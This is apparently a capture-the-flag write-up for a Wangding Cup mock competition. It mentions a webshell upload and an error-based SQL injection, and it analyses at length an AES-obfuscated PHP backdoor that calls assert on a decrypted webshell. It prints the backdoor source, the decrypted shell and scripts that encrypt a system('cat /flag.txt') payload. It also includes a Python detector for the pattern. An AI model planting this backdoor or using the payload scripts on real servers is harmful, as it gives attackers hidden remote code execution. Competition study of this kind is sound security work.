Wangding Cup Mock Competition
web
Sign-in
Omitted.
web1
Upload a PHP one-liner webshell.
web2
SQL injection. The injection point is in the message notifications, in the id parameter. It is a numeric injection; order by 4 was found immediately, then straightforward error-based injection.
web3
web3 was the only challenge with any real difficulty. The first page you see says that the system code has been tampered with. Scanning for directories turned up wwwroot.zip, so we downloaded the system source directly.
Reading the hint carefully: it says the site was shut down urgently because it had been tampered with, and that the system code had been backed up. If we have no interactive interface to work with, then some endpoint must still be live.
Iterating over every file, only one of them returned a string, so we audited that file directly.
describedssTest.php

<?php
error_reporting(0);
header("Content-type: text/html; charset=utf-8");
// AES key (also the md5 value the decrypted shell compares the GET id against), two encrypted blobs, and a fixed IV
$p8 = "3b7430adaed18facca7b799229138b7b";
$a8 = "TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0=";
$d8 =
"TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09";
$v8 = "0329647546905494";
// Encrypt: AES-128-CBC with the fixed IV, prefix the IV, then base64 twice
function e($D, $K)
{
    $cipher = "aes-128-cbc";
    $encrypted = openssl_encrypt($D, $cipher, $K, 0, $GLOBALS["v8"]);
    $result = base64_encode($GLOBALS["v8"] . $encrypted);
    $result = base64_encode($result);
    return $result;
}
// Decrypt: reverse of e(); strips the IV prefix and decrypts with the fixed IV
function d($D, $K)
{
    $cipher = "aes-128-cbc";
    $decodedData = base64_decode(base64_decode($D));
    $encryptedData = substr($decodedData, openssl_cipher_iv_length($cipher));
    $decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS["v8"]);
    return $decrypted;
}
// $a8 decrypts to the function name "assert"; $d8 decrypts to the webshell code,
// which is passed to it as a string and executed
$a8 = trim(d($a8, $p8));
ob_start();
$a8(trim(d($d8, $p8)));
// Whatever the shell printed is captured and echoed back encrypted with the same key
$O = ob_get_contents();
ob_end_clean();
echo e($O, $p8);
?>
Looking at the logic, the last few statements are all that matter: $a8 is decrypted first and comes out as assert, which is then called directly on the decrypted argument; $d8 decrypts to a webshell. When using that webshell to run commands, note that eval executes only one layer at a time, that the '' quotes have to be escaped with \, and that 20241026 has to be md5'd twice to equal 3b7430adaed18facca7b799229138b7b.
The webshell decrypted from d8:
@eval("if(md5(@\$_GET['id'])===\$p8){@eval(trim(d(\$_POST['d'],\$p8)));}")
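As an added example (not part of the original writeup), a small Python triage script that flags PHP files with this file's decrypt-then-call structure: blobs decoded with double base64 and openssl_decrypt, the decrypted string used as a function name, and buffered output. The indicator weights, the threshold, and both sample files are constructed for this example.

```python
import re

# Indicators of the decrypt-then-call pattern in describedssTest.php above;
# weights and threshold are assumptions chosen for this example.
INDICATORS = [
    ("error_suppression", re.compile(r"error_reporting\s*\(\s*0\s*\)"), 1),
    ("double_base64",     re.compile(r"base64_decode\s*\(\s*base64_decode\s*\("), 2),
    ("runtime_decrypt",   re.compile(r"openssl_decrypt\s*\("), 1),
    ("long_b64_literal",  re.compile(r"['\"][A-Za-z0-9+/=]{60,}['\"]"), 1),
    # "$name(...)": callee known only after decryption, so no literal eval/assert
    ("variable_call",     re.compile(r"(?<![\w$])\$\w+\s*\("), 3),
    ("output_capture",    re.compile(r"ob_start\s*\(.*?ob_get_contents\s*\(", re.S), 1),
]
THRESHOLD = 5

def scan_php_source(src: str) -> dict:
    hits = [name for name, rx, _ in INDICATORS if rx.search(src)]
    score = sum(w for name, _, w in INDICATORS if name in hits)
    return {"score": score, "hits": hits}

def is_suspicious(src: str, threshold: int = THRESHOLD) -> bool:
    return scan_php_source(src)["score"] >= threshold

# Constructed sample mirroring the backdoor's structure; key, IV and blobs
# are placeholders, not the challenge's values.
BACKDOOR_SAMPLE = """<?php
error_reporting(0);
$a8 = "BLOB";
$d8 = "BLOB";
function d($D, $K) {
    $decodedData = base64_decode(base64_decode($D));
    $encryptedData = substr($decodedData, openssl_cipher_iv_length("aes-128-cbc"));
    return openssl_decrypt($encryptedData, "aes-128-cbc", $K, 0, "PLACEHOLDER_IV");
}
$a8 = trim(d($a8, $p8));
ob_start();
$a8(trim(d($d8, $p8)));
$O = ob_get_contents();
ob_end_clean();
?>""".replace("BLOB", "A" * 64)

# Constructed benign sample: openssl_decrypt reading a config secret, with
# no run-time callee name and no output capture.
BENIGN_SAMPLE = """<?php
function load_secret(string $blob, string $key): string {
    $raw = base64_decode($blob);
    return openssl_decrypt(substr($raw, 16), "aes-128-cbc", $key, OPENSSL_RAW_DATA, substr($raw, 0, 16));
}
$dsn = load_secret(getenv("DB_BLOB"), getenv("DB_KEY"));
?>"""
```

Run it over a directory of extracted source and review anything at or above the threshold; a legitimate openssl_decrypt call alone scores well below it.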
Payload generation:
<?php
error_reporting(0);
header('Content-type: text/html; charset=utf-8');
$p8 = '3b7430adaed18facca7b799229138b7b';
$a8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR0ZLV1ZwdU9XSkZORmh2WnpoS1RrNW1jRTFrTkdjOVBRPT0=';
$d8 = 'TURNeU9UWTBOelUwTmprd05UUTVOR012V1c5cVJXNXBkWEJyZDFsemJsQlpNMmRITjNaYWVFVnFPVWRqVnpoWlUyNXZNbmhDU21jd2RHTkxRazF2U1hvMU9FNUNWM2RNUjFWYVJuVnBiV3czUlVwUldFMTFhakp2VjJKS1NIVlJUMU5UYjNoSWExUk5hMlZXY21OdlRuaHVRMjlsVkV4aEwzbGpQUT09';
$v8 = '0329647546905494';
function e($D, $K){
    $cipher = 'aes-128-cbc';
    $encrypted = openssl_encrypt($D, $cipher, $K, 0, $GLOBALS['v8']);
    $result = base64_encode($GLOBALS['v8'] . $encrypted);
    $result = base64_encode($result);
    return $result;
}
// Copied unchanged from the original file; not used when generating the payload
function d($D, $K){
    $cipher = 'aes-128-cbc';
    $decodedData = base64_decode(base64_decode($D));
    $encryptedData = substr($decodedData, openssl_cipher_iv_length($cipher));
    $decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS['v8']);
    return $decrypted;
}
// The code the shell evals after decrypting POST d. eval runs one layer at a
// time, so the inner single quotes have to be escaped with \ (see the note above).
$a = "eval('system(\'cat /flag.txt\');');";
echo $c = e($a, $p8);
?>
Decrypting the returned result:
<?php
$p8 = '3b7430adaed18facca7b799229138b7b';
$v8 = '0329647546905494';
function d($D, $K){
    $cipher = 'aes-128-cbc';
    $decodedData = base64_decode(base64_decode($D));
    $encryptedData = substr($decodedData, openssl_cipher_iv_length($cipher));
    $decrypted = openssl_decrypt($encryptedData, $cipher, $K, 0, $GLOBALS['v8']);
    return $decrypted;
}
echo d("TURNeU9UWTBOelUwTmprd05UUTVOREZYVW1wMFpuUTFTblJyV1VGbVV6a3JOa042ZWs4MVQxSnNURWxUWTJoeWVYSlNaRU5GWmxGc2FHOVRVamwyY0hwQ2FXNVVTMEpSTkhoU00wczNXWFk9", $p8);
?>
misc
Log analysis
Search the log directly for {